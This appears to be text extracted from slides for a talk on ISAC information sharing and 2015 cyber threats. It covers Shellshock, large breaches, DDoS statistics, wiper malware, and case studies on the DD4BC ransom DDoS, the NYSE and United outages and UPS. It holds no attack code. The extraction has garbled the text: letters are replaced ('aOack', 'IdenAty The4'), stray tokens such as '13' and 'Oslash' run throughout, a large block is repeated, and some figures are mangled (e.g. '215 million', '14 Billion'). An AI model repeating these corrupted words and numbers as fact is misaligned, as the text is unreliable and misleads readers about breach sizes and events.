bull GNU BashShellshock ndash Old vulnerability 1994 ndash Unix based Linux Apple Mac13 OX13 ndash Went13 public13 Wednesday 924 ndash Exploits and scanning seen almost13 immediately

be read

      

   

Breaches Malware ChewBacca Dexter Black POS

Oslash Target 70 million -shy‐ 2013 Oslash OPM 215 million Oslash Primera BCBS 112 million Oslash Community Health Systems 45 million Oslash Anthem13 BCBS 80 million Oslash SonyHacking Team13

2015 Breaches IdenKfied by the ITRC as of13 8112015

bullTotal Breaches13 5500 approx

bullTotal Records Exposed 818004561 bullIdenAty The4 Resource Center

Backoff

      

DDoS Oslash Sony PlayStaMon ndash Lizard Squad Oslash OperaMon13 Ababil13 Oslash Las Vegas ndash Gaming Industry Oslash Israel Oslash DD4BCOslash World Cup

Q1 2015 Compared to Q4 2014

15 decrease in avg aOack Mme35 increase in total DDoS aOacks 42 increase in SSDP DDoS aOacks (routers) 22 increase in aplicaMon layer DDoS aOacks 7 decrease in average aOack bandwidth (170 Gbps) 37 increase in infrastructure layer DDoS aOacks Akamai

  

    

  

  

Wiper Malware Oslash Shamoon ndash 2012

Oslash ANack on 30000 Saudi Aramco WorkstaMons Oslash Corrupts files and wipes devices

Oslash South Korean ANacksndash13 2013 Oslash 2 banks media company and insurance company Oslash Patch systems targeted and used to infect13 Oslash Wiped windows Linux and UNIX13 OS

Oslash Las Vegas13 Casinondash 2014 Oslash Wiped and destroyed files with VB bomb

Oslash Sony ndash 2014 Oslash SMB Worm13 Tool listening implant backdoor proxy

tool destrucMve hard drive tool destrucMve targeted cleaning tool network propogaMon wiper

Oslash Financial data destroyed financial system13 sMll inoperable ndash asks for delay in filing

    

The Media and Vendors MalverMsing Watering Holes

Syrian Electronic13 Army

Media Vendor Spin Incidents

bull HeartBleed13 Open SSL bull Hedge Fund ANack -shy‐ BAEbull Russians ANack Financial System13 bull Russians Hack 14 Billion Passwords -shy‐ Hold Security

     

Other13 Threats

bull Call Center ndash Phishing bull Mobile bull Social Media ndash Sony ExecuMve on American Airlines bull Industrial Control Systems -shy‐ Havex bull Espionage ndash VirusTotal tesMng for malware

Case Studies

   

DDoS ndash DD4BC

Since April 2015 bullSubject Line bullFrom From DD4BC Team ltd4bct[AT]gmail[]comgt bullSubject DDOS ATTACK

Size 500 Mbps to 50 Gbps Duration Up to 1 hour Ransom Demand 25-40 BTC

UnitedNYSE

NYSE July 8 2015 1132am 1145am chatter Noon definitive word

UNITED 826 am Reservation System

United13 Parcel13 Service

bull USSS NCCIC FS-shy‐ISAC ndashCollaborate to releasemalware analysis and risk miMgaMon recommendaMons

bull Shared with Retailers AssociaKon

bull UPS Detected13 and used13 to miKgate Malware

QuesKons

Page 35: Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface TransportaMon • Water ISAC • Over the Road & Motor Coach ISAC • Public Transit

      

   

Breaches Malware ChewBacca Dexter Black POS

Oslash Target 70 million -shy‐ 2013 Oslash OPM 215 million Oslash Primera BCBS 112 million Oslash Community Health Systems 45 million Oslash Anthem13 BCBS 80 million Oslash SonyHacking Team13

2015 Breaches IdenKfied by the ITRC as of13 8112015

bullTotal Breaches13 5500 approx

bullTotal Records Exposed 818004561 bullIdenAty The4 Resource Center

Backoff

      

DDoS Oslash Sony PlayStaMon ndash Lizard Squad Oslash OperaMon13 Ababil13 Oslash Las Vegas ndash Gaming Industry Oslash Israel Oslash DD4BCOslash World Cup

Q1 2015 Compared to Q4 2014

15 decrease in avg aOack Mme35 increase in total DDoS aOacks 42 increase in SSDP DDoS aOacks (routers) 22 increase in aplicaMon layer DDoS aOacks 7 decrease in average aOack bandwidth (170 Gbps) 37 increase in infrastructure layer DDoS aOacks Akamai

  

    

  

  

Wiper Malware Oslash Shamoon ndash 2012

Oslash ANack on 30000 Saudi Aramco WorkstaMons Oslash Corrupts files and wipes devices

Oslash South Korean ANacksndash13 2013 Oslash 2 banks media company and insurance company Oslash Patch systems targeted and used to infect13 Oslash Wiped windows Linux and UNIX13 OS

Oslash Las Vegas13 Casinondash 2014 Oslash Wiped and destroyed files with VB bomb

Oslash Sony ndash 2014 Oslash SMB Worm13 Tool listening implant backdoor proxy

tool destrucMve hard drive tool destrucMve targeted cleaning tool network propogaMon wiper

Oslash Financial data destroyed financial system13 sMll inoperable ndash asks for delay in filing

    

The Media and Vendors

• Malvertising
• Watering Holes
• Syrian Electronic Army

Media / Vendor Spin Incidents

• Heartbleed – OpenSSL
• Hedge Fund Attack – BAE
• Russians Attack Financial System
• Russians Hack 1.4 Billion Passwords – Hold Security

Other Threats

• Call Center – Phishing
• Mobile
• Social Media – Sony Executive on American Airlines
• Industrial Control Systems – Havex
• Espionage – VirusTotal testing for malware

Case Studies

DDoS – DD4BC

Since April 2015 – subject line and sender:

• From: DD4BC Team <d4bct[AT]gmail[.]com>
• Subject: DDOS ATTACK

• Size: 500 Mbps to 50 Gbps
• Duration: Up to 1 hour
• Ransom Demand: 25-40 BTC

United / NYSE

• NYSE – July 8, 2015: 11:32am; 11:45am chatter; noon definitive word
• UNITED – 8:26am: Reservation System

United Parcel Service

• USSS, NCCIC, FS-ISAC – Collaborate to release malware analysis and risk mitigation recommendations
• Shared with Retailers Association
• UPS detected and used to mitigate malware

Questions
